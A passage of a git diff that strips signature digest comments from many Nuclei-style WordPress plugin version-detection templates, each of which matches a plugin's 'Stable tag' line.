+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022036db9591e29a535ef04f3548da895cc45836f88a8a3195700ad91fc1064025d202201b3911825886b8f2f690a2287a9b6ccc2197c1ee3dabcfc4bce6387cd0584789:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 4b81e74e7b..268bd7b9df 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210093d462a0b147b0bab5152fc32b9aae1d168457a3dae551d0a1a5dee91498567002204357fdc754e3b8c436670a58862b3add8a5b44ca505e8201596c464dd840c3b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 79f301b983..d7fb2209d1 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100be3ee4d35774f7e10c0db31f63130077110f5a1ea7420f8239e413519b052b23022100d546b60bee135974e4b504a60ea12c38d988b9fffe19f3f17993b35b7daa09ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 8878deeccf..a1641d4632 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022030d115c65d797474c35d12372a54a1e110a625c201a92e2f81c813d67d07c06102206c06db3210136e6e2d9687d520e571575f901251829009fef697d42afa803662:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index e96dc2f0e4..3b6542683c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c8210ce244cdb635b2ab15c81d78ddccf7582f992312bf1cc561880ea0b09aaf02203650ff85bccd575132454977b02b05bc824b2a7a15185c083619cc9b2466af6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 49a933db44..969c280ee1 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022015892a496e91c25c5b63fad21778b6ce754f5f74e2a0a6a05f10b3459b542104022030ef6d4dca14ed222448fb059e51853a268d20a893c637e1a7a9fd94870b3eee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1b4d8330f8..1c97c422e4 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204e972da5a44d8ddac8283c06e402720a01ed2dbe70f546e83dc5a183d7be29cb022075a929fa441691cea6567e8e2a9dfc0e5465c0faf92be5a2e4877f5337794870:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 2711a7b035..7d861cf06a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220356c502cb16c811005a6dd7aa3b5c7ddaa668e0b714c963f3dc8e6412c4b5c8e0221008eda17e4638752552407f8161cc9068a9d9b18a89d48b077c6b1a3230ac283b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 1cf614018c..00eb1e2dfc 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ebdc6fd7d6759f4e5afe78142e0538dfe72c1cbf7d14750ca0bfd37a479845e80220740eda6c00f92e9f811e9cfecba04bbce9bc59a31eb8d4d9981a68b160605f83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index 1bf755bdb3..f089ee37d3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207d268a730484c1521b8e66e1f873ae965f0d2114fbf47a7a3bea2eca057c6fd702201368a370820cfd942b73b574979ed0500982c2980c1e8cabcec343654df32ef7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index bfefbc5e4a..492d66db68 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fd2b35ea721f4780a2364ed7190d7a13cd9ccbdaa5342f3626fa9602c5f1330d022006931f04038baf75adf342cb646a12e64e611bfc68465ad2e42dcf482d1df652:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7d6ed18c6f..f8903fa3db 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022078c3914a743ac865a8c462b16de57e17c01e8061e06b4cae97e73e8598b2200d022100ee67e8cdad74d94ec1f9de938f5003d1d6f7e7180c7fa9d2b58d8be860c8fb39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 1d0dc972bb..ae2451ca38 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220659854d9d453b597e99ec536856584a5e85fc39e1e889d50002e648db9668c0202200718206aec00f72faa78fd76491a2a2e36b85c1cdddbbf171296015d66c8c9ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 6566345e24..dcc61d1255 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206f1075cc0ff6de006d85bcb22bc50986ec5cbf4a7830bf499e3ce841f4813d1202210090b7e06fac88e921102119b09e6b51c80ebda0e5c1eca3d3d83596ebcd236dc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 03e78085f7..d1d2c1c1d0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220489942a3945e95f1cf17a5d65b3265298271036f676070d5b7e6c8f46e518b3c0221009490c2192ccf11447d3e390baeb83a06e6aa10cdf609074db2721be1f23e125b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 4f5b439488..5f5e8afed5 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220076d9421b4dcb80b66d95bd767be3dbcebd10b483115ac4f7ed1f242f6b50194022100f5fadce73ebe166abbf6b34c2323369d2f3f0e5e6315aac5b51e419e5584ea57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 8f20bd8668..d15634bb2b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cb3cff15f2ad70357975c3e69ac11e909da71947e7f4dab930d0086fc2342134022100f1ad6363724a6b8751b59cb012b5ed516d71936bf89da9f6ca6aa0076d553548:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 2dbbedaf2d..7da04be5d3 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210097972e736ed11b4f1d3900e3f75cb509cdfd08b5347ec9c4d40ecc369b20956b022071cb27db3fc347d4e524963675a81526958b3aa1db575b9cd6acaa9f113e7c26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 3e6438faac..a79253cec5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d3d5b40215f3ef92213f39022dbed512d7cccc2e43276bb09c1ff1e0f58b37f2022011692210364c52e3aa9eab1eaeae702a24b6141cdcd6e77578c95847ee7e5243:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 5c77d6cdff..77fc04a220 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d47ce1043936333554c3acdbeb9d1778cd652227b4af3a04c9348eb56b967a3002204237c82cf384e90ab6a10c094249b814d45ff894f120c01662d19ac2f2ea011e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 41d35d2130..733f9ee453 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022060bb4d68e4124c13cf78c83ce2659074302baca648fac41dc64cb3aba884fc150221009d9461ffd175c8320f753a52d0b4f1d93cffd0112b97b63223a5676d4bf8f25c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index ade751e8be..0af08f0ac0 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008e45d103e4fde972e1b81ee38482599e5eb76a819a1300a545852ee49870f52a02200cbc05cc0319c9ebad9a45aec4022fde268af05606dae3b9173dd54fcfe1292e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 19327f3ddc..1e4c77fbca 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c8261cb9c3743049d0da88307088d0969ce381d21a75e78172cff9226730ca99022100f8f4bd4f6ef1699cf1a3871b912d5955e6ad9e60573bce9abd6ce1f3ad3a5acb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index c600b99f19..295e3fe82d 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022036c55ea25525e822d87d3467d3bbe3b6244024608aba8fdabdfd929d88f29d8a0221008814eec272edcffa919ee3548436fdb0f7e3bb1359ee1afe2894300187b686b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 93f54ad182..862f73201f 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008fef2355754f039f5165cc9ae9f97e1784e37dce24d7564d03b48100a23eecc4022100a9223430dcf8bcfc173a7ab9fe0052d688ef22cdaffea597f64b85c374cd0e50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index ddb7fafc07..711b64f9d0 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202447020bab4e2790bba359e76f33cc5b7fb71e66a1a1432f2b456739d1571e510221009a37b946dde63fe156c6cda837dfc973f5e4927d5984076af0565ebc4031a73f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index b961829045..58ddcfab78 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100965480ce85db1e228ed4b89079178211e0018ca1962e4b84abcf66fbd8444f77022100898127aaa95052de916a7ac2cc6b06667a3d0a886a79b69725a1c18b5187e8f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 913589dd20..305d74e8ea 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200c42c60b14f158c4a0628b649184af2145a8a561ae19aa0a43ab92d2e88bc4ec02205afbd74e9291662f50483d5f33428a0c371f1a4c7e5c9cc20c6204c99ab5e680:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index ab11a4ddad..668162fc4e 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220482f9fe93de822ecbcd80dd11d6889f131e62c5dbe59fe80965edf710bf7ea57022024e56a288abaec85b5e78723389eab047c92d6a3e556fc8d9ad0058e4107c587:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 9167acb6e0..4f99876557 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022053f56c856672cd5437fe190f8ddf3ac6ca4ccdabf883b5c12550b373557ae61802205810fcf18dabc01c83d39c68b5c3ad7d0f26c33e6de5ada8b5b3a5ac0df28644:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 9b6bb7b53f..a0d2554492 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bcd575f4b04e2b4a7bcdc732fb3c108e53188b528e96588d1da6a76fc51307d8022100d5d0548d4ba35eb1ec6a8eed7cc7451e3704eb4e002ffe95a90fea0fed96c55c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 22612c6cc3..4e5046273d 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d9d0e671b444e7fbcc505de73ce2467c0ab101ee6e7a24d5944532728762e9f2022100ced0aeb1462151d2f56729b99777fc98adba666736482172c5c73acc91de3899:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index fb1903d50b..f44cee7980 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022042bcaf90a40ae83384580dba1f0df23ac02684b1f996ee31996cf9405443f4a1022100d1ae499f18da448848707a9421be1addfc2e60afe7e4a298817a9b8c915972bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 0e878ce214..39130db767 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f8387e2170e6eb8a34525c255614efbef585b01de52f74ab6866d0998397bf54022100d230c0bc05100968e58a019f7b62451294c56da10ec1da5e1fe05080dd8e03d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 2b6408c86c..39c497073c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b080daf0928d86ebc3a68599e70daa8ef44fdba3a827f38779e7484eb4f8c61e0220033050eab5704bcd4ebd82d5506f09a92992b4ceb635ab23e3ca24a949856693:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index 2e23ab92a2..b848288b55 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206a17d309fe65a146d87fec1fb3e8204dc9725fffca16e87be044e9fee763c9d80220760bf15bbe844609f78706b925981dc6e7a61c0fa98de6dbf507338e5aeed188:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 0e87dec0bc..4d10178692 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022014fca11dbecd3f7b100f0ee382f48a258e6620bf6d8e4aede2a9b6cb4b8741590220196017535cae218a4b9d08ddd3a4147dc9d702e6ccf7eec2f319ddd12dda46d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index e7362fe954..7aac0a153f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200d8ee19df4c8204503bc2a348842c19566f82db08da6034627d7140e0d6ed5cf022100f69e7fbb43b98b294090f93733755cf3a40c27a5c450373aaf6d8fc970a15995:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 7009bdd5d5..d0cebd5316 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022050a2336cde0de8b90755b475eec4a4e1ec5436094af3e10a485df154f597f8030221008bbde5a57055a6769224a450c5e4addb79e22a644f2522258461b34635ee684e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index dce76d8d05..ff20779157 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100afaee136b00909658f93a9654e1b52dbe3f022ec3be3eda24d60b65b744bbc6902206b8aba2cd3403c74744f6343ec7c9cc97c80cc4be7da482f653ba877ecc96fa9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index c7c6d91cc5..fffdc7d017 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bc5aed774d1b2128b49d0e0d36ea2a681d021d52bcabffe6f96557b6ff90be82022100a9ee86dbdfaa7ea4ee3704c13298b6598c778ee09eba80ca98afd6677b02df5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index eb0d512bb0..7a9746a70d 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e640093dfad085aba8706b2eaaf56d48e0fbb65b5a9216a72a6c0c00e32bb11e02207167fe0f44166fba090e20f3275616b869db062995e72492e74099c0da366973:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 95e297b0f3..3fe86debf5 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bf322e116c69e52eeddf83eef48535cecfd75743ee125fe55470d883198c6901022100de0dffd6fbcecd2012624b1e26f089fe5a0c62aa6a1dbe43da11e52cdbb42ec6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 2767a41fdd..3deac58709 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022062ea563957d3ebdb3915c01b997421e0a7b56eb7aed0925d64baca5f72d28f81022100d5c9fec46f4742c882262a70a6075ab02e557224df2e84c28244d8980c57c4cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index b7d68ba8fc..e7e7c27682 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e527c54b09a9c85bcc1d9646ece627dc06e53e6025bf6deb43211e3489f6910b022069c28b97daf15a7cfd24a1cc397519f733b4adb887484f4cc01adc99db51392f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 92dc8a24ee..ad4ebefa4b 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cded7a6dd50ce10ff543b385429a3d010030e356d4c049a962f0a9fa91a0ed5402200904f1af7b3c0bf12619e408ee89def82d2bddcf378719a1296513274f5314bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index f182a9a5f5..8e88c81c0a 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100aa6eff4d1ddce1aa616ec1480df1e9cc35311f785d42d613105a3bacfa4579e0022100a6dc602e3cc81bd99ff3f5d6159ecfd5e61fff79bb820c2935e5dcb361675598:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 8caa226535..39d269fb85 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 